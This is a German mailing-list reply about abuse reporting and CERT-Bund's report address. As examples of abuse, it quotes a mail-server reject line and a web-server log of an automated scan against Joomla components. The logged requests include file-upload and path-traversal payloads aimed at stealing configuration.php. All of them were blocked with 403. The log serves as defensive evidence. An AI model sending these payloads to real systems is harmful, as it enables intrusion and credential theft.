On 11.09.2018 12:06, Patrick Ben Koetter wrote:
Postmaster aufgepasst!
Ihr wollt *bitte* die Absenderadresse reports@reports.cert-bund.de
whitelisten.
irgendwie ein Widerspruch; nicht mir soll man abuse Dritter
schicken,
sondern ich hätte gerne was wohin ich Abuse¹-Meldungen durch Dritte
schicken kann,
wo sich auch jemand darum kümmert, und nicht der Eindruck entsteht,
daß es gegen /dev/null geht ...
¹ Abuse der sich nicht auf SMTP beschränkt ...
ob es um sowas im /var/log/maillog
Sep 10 00:30:33 vhost01 postfix/smtpd[18678]: NOQUEUE: reject: MAIL from mail.bioltec.de[109.199.169.90]: 554 5.7.1 <johndube426@gmail.com>: Sender address rejected: Domain (gmail.com) blocked; from=<johndube426@gmail.com> proto=ESMTP helo=<mail.bioltec.de>
oder sowas im /var/log/httpd/access.log
185.81.157.108 - - [09/Sep/2018:04:27:16 +0200] "GET /rxr.php?rxr
HTTP/1.1" 403 255 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:21 +0200] "POST
/index.php?option=com_jdownloads&Itemid=0&view=upload
HTTP/1.1" 403 302 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:26 +0200] "GET
/images/jdownloads/screenshots/rxrking.php3.g?rxr HTTP/1.1" 403 255
"-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:31 +0200] "GET
/components/com_jbcatalog/libraries/jsupload/ HTTP/1.1" 403 251 "-"
"python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:36 +0200] "POST
/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1536452035.php
HTTP/1.1" 403 377 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:41 +0200] "GET
/components/RxR_1536452035.php HTTP/1.1" 403 251 "-"
"python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:47 +0200] "GET
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
HTTP/1.1" 403 356 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:52 +0200] "GET
/index.php?option=com_adsmanager&task=upload&tmpl=component
HTTP/1.1" 403 308 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:27:57 +0200] "GET
/index.php?option=com_myblog&task=ajaxupload HTTP/1.1" 403 289
"-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:28:02 +0200] "GET
/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php
HTTP/1.1" 403 280 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:28:07 +0200] "GET
/index.php?option=com_macgallery&view=download&albumid=../../configuration.php
HTTP/1.1" 403 327 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:28:12 +0200] "GET
/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php
HTTP/1.1" 403 341 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:28:17 +0200] "GET
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php
HTTP/1.1" 403 352 "-" "python-requests/2.19.1"
185.81.157.108 - - [09/Sep/2018:04:28:22 +0200] "GET
/index.php?option=com_facegallery&task=imageDownload&img_name=../../configuration.php
HTTP/1.1" 403 334 "-" "python-requests/2.19.1"
geht, spielt dabei keine Rolle ...
Grüße,
Walter